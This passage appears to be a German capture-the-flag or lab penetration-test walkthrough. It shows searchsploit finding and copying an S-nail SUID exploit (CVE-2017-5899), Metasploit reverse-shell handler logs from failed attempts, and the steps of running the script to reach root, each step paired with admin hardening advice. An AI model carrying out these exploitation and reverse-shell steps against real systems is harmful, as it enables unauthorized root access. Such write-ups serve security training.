S-nail < 14.8.16 - Local Privilege Escalation | multiple/local/47172.sh
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Results
Analyse: `searchsploit s-nail` durchsucht die lokale Exploit-DB-Kopie nach Exploits, die "s-nail" enthalten.
Bewertung: Ein passender Exploit wird gefunden: `multiple/local/47172.sh` für "S-nail < 14.8.16 - Local Privilege Escalation". Dies passt gut zu dem alten Datum (2016) der gefundenen Binärdatei.
Empfehlung (Pentester): Kopieren Sie diesen Exploit (`searchsploit -m multiple/local/47172.sh`) und untersuchen Sie ihn. Übertragen Sie ihn auf das Zielsystem (z.B. nach `/tmp`).
Empfehlung (Admin): Patching von `s-nail` ist erforderlich.
Exploit: S-nail < 14.8.16 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/47172
Path: /usr/share/exploitdb/exploits/multiple/local/47172.sh
Codes: CVE-2017-5899
Verified: False
File Type: POSIX shell script, ASCII text executable
Copied to: /root/47172.sh
Analyse: Der Befehl kopiert den Exploit-Code in das aktuelle Verzeichnis (`/root/47172.sh`). Zusätzliche Informationen wie die zugehörige CVE (CVE-2017-5899) werden angezeigt.
Bewertung: Der Exploit steht nun zur Übertragung und Ausführung bereit.
Empfehlung (Pentester): Übertragen Sie `47172.sh` auf das Ziel (`/tmp`), geben Sie ihm Ausführrechte (`chmod +x`) und führen Sie ihn aus.
Empfehlung (Admin): Keine Aktion.
An dieser Stelle folgen im Log einige fehlgeschlagene oder abgebrochene Versuche mit Metasploit (Handler, Reverse Shell, su_login Exploit). Diese scheinen nicht zum Erfolg geführt zu haben und wurden zugunsten des lokalen s-nail-Exploits verworfen.
[*] Using configured payload generic/shell_reverse_tcp
[*] Started reverse TCP handler on 192.168.2.199:5555
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.2.117 - Command shell session 1 closed.
-bash: /var/www/html/bind/bind.php: Permission denied
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Uploading payload to target
[*] Attempting to login with su
[*] Exploit completed, but no session was created.
Analyse: Versuche, eine Reverse Shell über Python zu etablieren und den Metasploit-Exploit `su_login` zu verwenden, wurden unternommen.
Bewertung: Diese Versuche waren nicht erfolgreich oder wurden abgebrochen. Der Metasploit-Handler empfing keine gültige Session, der Schreibversuch im Webverzeichnis scheiterte an Berechtigungen, und der `su_login`-Exploit konnte keine Sitzung erstellen (wahrscheinlich, weil kein gültiges Root-Passwort bekannt war).
Empfehlung (Pentester): Konzentrieren Sie sich auf den vielversprechenderen lokalen Exploit für `s-nail` (47172.sh).
Empfehlung (Admin): Diese Versuche unterstreichen die Notwendigkeit, ausgehende Verbindungen zu kontrollieren und die Berechtigungen im Web-Verzeichnis korrekt zu setzen.
Dieser Abschnitt beschreibt die Ausnutzung der Schwachstelle CVE-2017-5899 im SUID-Binary `/usr/lib/s-nail/s-nail-privsep`, um Root-Rechte zu erlangen.
Kurzbeschreibung: Der `find`-Befehl identifizierte `/usr/lib/s-nail/s-nail-privsep` als SUID-Root-Binary. `searchsploit` fand den Exploit `47172.sh` für CVE-2017-5899, der diese Binärdatei in anfälligen Versionen zur Privilegienerweiterung ausnutzt.
Voraussetzungen: Shell-Zugriff als Benutzer `chad`. Übertragung des Exploit-Skripts `47172.sh` auf das Zielsystem (z.B. nach `/tmp/ex.sh`).
Schritt 1: Vorbereitung des Exploits auf dem Zielsystem
Wir gehen davon aus, dass der Exploit `47172.sh` nach `/tmp/ex.sh` auf das Zielsystem übertragen wurde.
Analyse: Wechseln in das `/tmp`-Verzeichnis und Öffnen/Erstellen der Exploit-Datei `ex.sh` mit `vi`.
Bewertung: Vorbereitung des Exploit-Skripts.
Empfehlung (Pentester): Stellen Sie sicher, dass der Inhalt von `47172.sh` korrekt in `ex.sh` eingefügt wurde.
Empfehlung (Admin): Überwachen Sie verdächtige Aktivitäten im `/tmp`-Verzeichnis. Erwägen Sie, `/tmp` mit `noexec` zu mounten, um die Ausführung von Skripten zu verhindern (dies kann jedoch legitime Anwendungen beeinträchtigen).
-bash: ./ex.sh: Permission denied
Analyse: Erster Versuch, das Skript auszuführen.
Bewertung: Schlägt fehl, da die Datei keine Ausführrechte hat.
Empfehlung (Pentester): Fügen Sie Ausführrechte hinzu (`chmod +x`).
Empfehlung (Admin): Keine Aktion.
Analyse: Fügt dem Skript Ausführrechte hinzu.
Bewertung: Notwendiger Schritt.
Empfehlung (Pentester): Führen Sie das Skript jetzt aus.
Empfehlung (Admin): Keine Aktion.
Schritt 2: Ausführung des Exploits
[~] Found privsep: /usr/lib/s-nail/s-nail-privsep
[.] Compiling /var/tmp/.snail.so.c ...
#
Analyse: Das Exploit-Skript `ex.sh` wird ausgeführt. Es findet die anfällige SUID-Binärdatei, kompiliert eine kleine C-Datei (wahrscheinlich eine Shared Library, die über Umgebungsvariablen geladen wird, um die Schwachstelle auszunutzen) und führt den Exploit aus.
Bewertung: Erfolg! Der Prompt wechselt zu `#`, was den Root-Benutzer anzeigt.
Empfehlung (Pentester): Überprüfen Sie die Rechte mit `id`.
Empfehlung (Admin): Dringend `s-nail` patchen oder SUID-Bit entfernen.
Schritt 3: Bestätigung des Root-Zugriffs
uid=0(root) gid=0(root) groups=1000(chad)
Analyse: Der `id`-Befehl wird in der neuen Shell ausgeführt.
Bewertung: Bestätigt `uid=0(root)`. Die Privilegienerweiterung mittels CVE-2017-5899 war erfolgreich.
Empfehlung (Pentester): Ziel erreicht. Sammeln Sie die Root-Flagge.
Empfehlung (Admin): Dringendes Patching erforderlich.
Risikobewertung: Die Kombination aus einem erratbaren SSH-Passwort (durch OSINT/Custom Wordlist) und der ungepatchten S-nail SUID-Schwachstelle (CVE-2017-5899) stellt ein hohes Risiko dar, das zur vollständigen Systemkompromittierung führte.
Empfehlungen (Zusammenfassung):